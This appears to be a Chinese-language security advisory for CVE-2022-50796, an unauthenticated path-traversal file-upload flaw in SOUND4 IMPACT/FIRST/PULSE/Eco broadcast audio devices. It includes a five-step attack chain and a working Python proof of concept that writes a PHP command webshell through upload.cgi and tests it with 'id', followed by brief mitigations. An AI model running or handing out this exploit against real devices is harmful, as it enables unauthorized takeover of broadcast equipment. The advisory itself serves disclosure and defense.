CVE-2022-50796 SOUND4 IMPACT/FIRST/PULSE/Eco upload.cgi未授权RCE漏洞

漏洞信息

漏洞编号

CVE-2022-50796

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SOUND4 IMPACT, SOUND4 FIRST, SOUND4 PULSE, SOUND4 Eco

漏洞概述

CVE-2022-50796是SOUND4公司生产的广播音频处理设备IMPACT、FIRST、PULSE和Eco系列中存在的高危安全漏洞。该漏洞存在于设备的固件上传功能中，由于upload.cgi脚本缺乏适当的输入验证和权限控制，攻击者可以在未经认证的情况下利用路径遍历技术将恶意文件写入系统任意位置。成功利用此漏洞可获得www-data用户权限，进而实现远程代码执行，对设备的机密性、完整性和可用性造成严重影响。由于该设备通常部署在广播电台和专业音频环境中，漏洞利用可能对广播业务连续性造成威胁。CVSS评分高达9.8，属于严重级别，建议立即采取修复措施。

技术细节

该漏洞的根本原因在于SOUND4设备的web管理界面中upload.cgi脚本对用户上传的文件名和路径缺乏有效过滤。攻击者可利用路径遍历字符序列（如../）绕过目录限制，将恶意文件写入系统关键位置。具体来说，攻击者构造包含路径遍历载荷的HTTP请求，上传包含恶意代码的文件到非预期目录。由于设备以www-data权限运行web服务，攻击者获得的是web服务用户的代码执行能力。攻击者通常会上传webshell或反弹shell脚本到web根目录，然后通过HTTP请求触发执行。该漏洞影响固件版本2.x及以下的所有SOUND4 IMPACT/FIRST/PULSE/Eco设备。攻击成功后，攻击者可进一步横向移动或窃取广播内容数据。

攻击链分析

STEP 1

步骤1: 信息收集

识别目标设备为SOUND4 IMPACT/FIRST/PULSE/Eco设备，确认固件版本<=2.x，开放web管理界面

STEP 2

步骤2: 构造恶意请求

构造包含路径遍历载荷的HTTP POST请求，将恶意文件（如webshell）的文件名设置为../../../var/www/html/shell.php

STEP 3

步骤3: 上传恶意文件

向/upload.cgi或/cgi-bin/upload.cgi端点发送构造的请求，利用路径遍历绕过目录限制，将webshell写入web根目录

STEP 4

步骤4: 获取代码执行

通过HTTP请求访问上传的webshell，在参数中传递系统命令，实现远程代码执行

STEP 5

步骤5: 持久化控制

上传更多恶意工具，建立持久化后门，可能进一步横向移动或窃取广播数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2022-50796 PoC - SOUND4 IMPACT/FIRST/PULSE/Eco upload.cgi RCE
# Target: SOUND4 devices running firmware <= 2.x

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080'

# Malicious file content - webshell
webshell_content = b'<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>'

# Path traversal payload to write outside web root
filename = '../../../var/www/html/shell.php'

url = f'{target}/cgi-bin/upload.cgi'

files = {
    'file': (filename, webshell_content, 'application/octet-stream')
}

headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; CVE-2022-50796)',
}

print(f'[*] Exploiting CVE-2022-50796 against {target}')
print(f'[*] Uploading webshell via path traversal...')

try:
    response = requests.post(url, files=files, headers=headers, timeout=10)
    print(f'[*] Status code: {response.status_code}')
    
    # Verify upload
    shell_url = f'{target}/shell.php'
    verify = requests.get(shell_url, params={'cmd': 'id'}, timeout=10)
    if 'uid=' in verify.text:
        print('[+] RCE successful! Webshell uploaded.')
        print(f'[+] Access shell at: {shell_url}?cmd=<command>')
    else:
        print('[-] Upload may have failed or path traversal blocked.')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')

影响范围

SOUND4 IMPACT <= 2.x

SOUND4 FIRST <= 2.x

SOUND4 PULSE <= 2.x

SOUND4 Eco <= 2.x

防御指南

临时缓解措施

在网络层实施访问控制，确保web管理界面仅对授权管理IP开放；暂时禁用设备的固件上传功能；部署WAF规则阻断包含路径遍历特征（../等）的请求；监控设备异常行为和外部连接尝试。建议尽快联系厂商获取固件更新。